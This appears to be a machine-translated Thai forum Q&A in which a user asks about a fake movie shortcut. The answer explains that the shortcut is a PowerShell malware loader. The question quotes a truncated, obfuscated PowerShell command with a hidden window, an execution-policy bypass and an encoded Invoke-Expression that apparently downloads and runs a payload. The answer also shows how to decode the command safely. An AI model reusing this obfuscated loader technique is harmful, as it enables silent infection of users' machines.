ลิงก์นี้ทำอะไรเป็นพิเศษหรือเป็นไวรัส [ซ้ำ]

ใน Windows 10 ฉันดาวน์โหลดไฟล์นี้ที่ฉันคิดว่าเป็นภาพยนตร์ แต่มันตัดสั้นขนาด 700MB

ฉันเห็นว่าเป้าหมายคือสิ่งนี้

C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -NoPr --WINd   1 -eXEc ByP ($ pshOmE [4] + $ PShoMe [30] + 'X') (-JoiN ((44, 141,   163,160, 170, 40, 75, 40, 50,50, 116, 145, 167,55, 117, 142,   152,145, 143, 164,40,123, 171,163,164, 145,155,56, 116

และมันถูกตั้งค่าให้เริ่มต้นที่

% systemroot% \ System32 \ WindowsPowerShell \ v1.0

มันทำอะไร?

มันเป็นตัวโหลดมัลแวร์

มันรันรหัส PowerShell เริ่มต้นด้วย New-Object System.N... (ซ่อนอยู่ในตัวเลข) ซึ่งในเนื้อหาฉบับเต็มนั้น New-Object System.Net.WebClientซึ่งจะถูกใช้เพื่อดาวน์โหลดและเรียกใช้มัลแวร์จริงจาก URL ที่ซ่อนอยู่ในรหัสเพิ่มเติมของรหัสที่สับสน

หากคุณคลิกลิงก์ไปแล้วแสดงว่าคุณมีแนวโน้มติดเชื้อแล้วเว้นแต่ว่า URL นั้นถูกลบไปแล้ว

คุณอาจลองวางเส้นของคุณเพื่อ notepad แล้วลบทุกอย่างก่อน ( -JoiN( (คัดลอกส่วนที่เหลือ (เริ่มต้นด้วย ( -JoiN( (... ) และวางลงในหน้าต่าง PowerShell มันจะเปิดเผยรหัส PowerShell ที่ยุ่งเหยิงซึ่งโดยปกติแล้วจะถูกเรียกใช้งานโดยก่อนหน้านี้ $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.